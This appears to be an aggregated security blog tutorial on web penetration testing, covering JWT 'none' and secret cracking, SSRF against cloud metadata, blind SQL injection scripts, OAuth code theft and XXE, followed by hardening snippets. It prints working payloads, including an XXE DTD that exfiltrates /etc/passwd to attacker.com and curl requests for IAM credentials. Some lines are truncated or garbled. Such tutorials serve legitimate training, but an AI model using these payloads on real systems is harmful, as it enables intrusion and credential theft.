Listen to this Post
Introduction:
The modern web application landscape is a complex ecosystem of APIs, microservices, and identity standards, creating a vast attack surface for penetration testers and malicious actors alike. As applications shift toward stateless authentication and cloud-native architectures, vulnerabilities such as JSON Web Token (JWT) misconfigurations, Server-Side Request Forgery (SSRF), and OAuth authorization flaws have become prime targets for exploitation. This article provides a technical roadmap based on practical, hands-on web security testing, mirroring the skills validated by certifications like the Web RTA, to help security professionals identify, exploit, and mitigate these critical risks.
Learning Objectives:
- Understand how to identify and exploit common web vulnerabilities including SQL Injection (SQLi), XXE, and SSRF using manual and automated techniques.
- Master the art of attacking identity and access control mechanisms by manipulating JWT implementations and OAuth 2.0/OpenID Connect flows.
- Develop practical skills in using Linux command-line tools, Burp Suite, and custom scripts to chain vulnerabilities for maximum impact.
You Should Know:
- Exploiting JWT Misconfigurations: From “None” Algorithm to Key Confusion
JSON Web Tokens are the backbone of modern API authentication, but implementation flaws often render them useless. The most common misconfigurations include the use of weak signing keys, accepting the “none” algorithm, and algorithm confusion attacks.
Step‑by‑step guide explaining what this does and how to use it:
1. Intercept the Token: Use Burp Suite to capture a request containing a JWT (usually in the `Authorization: Bearer
2. Analyze the Structure: Decode the JWT using a tool like `jwt.io` or the command line. You can use `jq` to parse the base64 parts if you script it:
!/bin/bash Decode JWT header and payload from a token token="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.token_part" header=$(echo -n $token | cut -d "." -f1 | base64 -d 2>/dev/null) payload=$(echo -n $token | cut -d "." -f2 | base64 -d 2>/dev/null) echo "Header: $header" echo "Payload: $payload"
3. Test for “None” Algorithm: Modify the header to set the algorithm to “none”. Re-encode the header and payload (keeping the original payload) and set the signature to an empty string.
Python snippet to craft a 'none' algorithm token
import jwt
Token with alg set to None (exploit)
token_none = jwt.encode({"user": "admin"}, key=None, algorithm="none")
print(token_none)
4. Brute-force Weak Secret: If the algorithm is HS256, attempt to crack the secret using a dictionary.
Using john (jumbo) to crack JWT echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature" > jwt.hash john jwt.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
- Server-Side Request Forgery (SSRF): Turning the Server into Your Proxy
SSRF allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing. This is often used to bypass firewalls, access internal services (like AWS metadata), or port-scan the internal network.
Step‑by‑step guide explaining what this does and how to use it:
1. Identify Input Vectors: Look for features that fetch a URL from user input (e.g., “Import from URL,” webhooks, image uploads via URL).
2. Basic Bypass Techniques: Start with simple internal IP addresses.
– `http://127.0.0.1:8080/admin`
– `http://localhost:22`
– http://[::1]:80`127.0.0.1`.
3. Advanced Bypass using DNS: Use subdomains or DNS rebinding services to circumvent weak blocklists. Edit your `/etc/hosts` file locally for testing, or use a custom domain pointing to
4. Cloud Metadata Extraction: If the application is hosted on AWS, attempt to access the Instance Metadata Service (IMDSv1).
Attempt to fetch IAM role credentials via SSRF curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/" curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]"
5. Automating SSRF with Burp Intruder: Use Burp Intruder to fuzz for open ports on the internal network. Payloads can be `http://192.168.1.1:80`, `http://192.168.1.1:22`, etc., monitoring for differences in response time or content length.
3. SQL Injection (SQLi): Manual Exploitation Beyond SQLMap
While automated tools are useful, manual SQL injection is crucial for navigating complex WAFs and blind scenarios. Boolean-based and time-based blind injections are essential skills.
Step‑by‑step guide explaining what this does and how to use it:
1. Detection: Inject a single quote (') or a logical payload like `’ OR 1=1– -` to break the original query.
2. Boolean-Based Blind (Manual): Determine the database name length by asking true/false questions.
Payload to check if the first character of the database name is 'a' (ASCII 97) ' AND (SELECT ascii(substring(database(),1,1))) = 97 -- -
If the page loads normally (true condition), the character is ‘a’. If it errors or shows a different result, it’s false.
3. Time-Based Blind (MySQL): When no visible output changes, use sleep commands.
Check if user is root using time delay ' AND IF((SELECT user()) = 'root@localhost', sleep(5), null) -- -
4. Extracting Data with Linux Command Line (cURL): Automate the boolean process using bash.
!/bin/bash
Simple boolean-based extraction (conceptual)
for i in {1..30}; do
for ascii in {65..122}; do
Send request and grep for indicator of "true" condition (e.g., "Welcome" message)
curl -s "http://target.com/page.php?id=1' AND ascii(substring(database(),$i,1))=$ascii-- -" | grep "Welcome"
if [ $? -eq 0 ]; then
printf "\x$(printf %x $ascii)"
break
fi
done
done
4. OAuth 2.0 Authorization Flaws: The Misconfigured Handshake
OAuth flaws often arise from improper validation of the `redirect_uri` or leakage of authorization codes. An attacker can steal a code and hijack a user’s account.
Step‑by‑step guide explaining what this does and how to use it:
1. Redirect_URI Bypass: Test if the endpoint allows open redirects. Change the `redirect_uri` parameter to a domain you control.
– Legit: `https://app.com/oauth/callback`
– Malicious: `https://attacker.com/steal.php`
2. Leaking the Code via Referer: If the `redirect_uri` is vulnerable to open redirect, the OAuth flow will send the user to your site along with the `code` parameter.
3. CSRF on OAuth Flow: Check if the `state` parameter is present and properly validated. If missing, an attacker can initiate an OAuth flow and trick the victim into linking their account to the attacker’s session.
4. Simulating the Flow with cURL: Once you have a stolen code, exchange it for an access token.
Exchange code for token (POST request) curl -X POST https://api.target.com/oauth/token \ -d "client_id=YOUR_CLIENT_ID" \ -d "client_secret=YOUR_CLIENT_SECRET" \ -d "redirect_uri=https://attacker.com" \ -d "code=STOLEN_AUTHORIZATION_CODE" \ -d "grant_type=authorization_code"
- XXE (XML External Entity) Injection: From File Read to RCE
XXE attacks exploit XML parsers that process external entities. This can lead to reading local files, performing SSRF, or in rare cases, Remote Code Execution.
Step‑by‑step guide explaining what this does and how to use it:
1. Locate XML Input: Find endpoints that accept XML (e.g., SOAP APIs, file uploads, old web services). Change the `Content-Type` header to `application/xml` even if the form expects JSON.
2. Basic File Read: Inject a malicious DOCTYPE.
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>
3. Blind XXE Exfiltration: If no output is reflected, use an external DTD to exfiltrate data via out-of-band (OOB) channels. Host a malicious DTD on your server.
Malicious DTD (attacker.com/xxe.dtd) <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % oob "<!ENTITY &x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>"> %oob;
Injection payload <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://attacker.com/xxe.dtd"> <foo>&exfil;</foo>
6. API Security Hardening: Mitigation Commands and Configurations
Understanding exploitation is useless without knowing how to fix it. Here are configuration snippets for securing APIs against the attacks above.
Step‑by‑step guide explaining what this does and how to use it:
1. JWT Hardening (Node.js Example): Ensure the library rejects tokens with mismatched algorithms.
// Using jsonwebtoken library, explicitly specify algorithms
jwt.verify(token, secretOrPublicKey, { algorithms: ['HS256'] }, (err, decoded) => {
// Rejects RS256 tokens here
});
2. SSRF Prevention (Linux/Network Level): Block egress traffic to internal IP ranges via iptables.
Block access to metadata IP and internal ranges iptables -A OUTPUT -d 169.254.169.254 -j DROP iptables -A OUTPUT -d 127.0.0.0/8 -j DROP iptables -A OUTPUT -d 10.0.0.0/8 -j DROP iptables -A OUTPUT -d 172.16.0.0/12 -j DROP iptables -A OUTPUT -d 192.168.0.0/16 -j DROP
3. OAuth State Parameter: Always generate a cryptographically random `state` parameter and validate it on the callback.
Python Flask example
import secrets
state = secrets.token_urlsafe(16)
session['oauth_state'] = state
Later in callback:
if request.args.get('state') != session.get('oauth_state'):
abort(403)
What Undercode Say:
- The Human Element Remains the Weakest Link: While these exploits target code, they often succeed because of developer assumptions—assuming no one will guess the JWT secret, or that internal IPs are unreachable. Secure coding practices must be reinforced with automated security testing in the CI/CD pipeline.
- Hands-On Skills Trump Theory: The shift toward practical certifications like Web RTA highlights the industry’s demand for testers who can chain these vulnerabilities. Knowing how to manually craft a blind SQLi payload or bypass an SSRF blocklist with DNS tricks is far more valuable than simply running a scanner. The future of web defense lies in understanding the attacker’s mindset, which requires continuous, hands-on lab practice.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Sahil Ninnad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
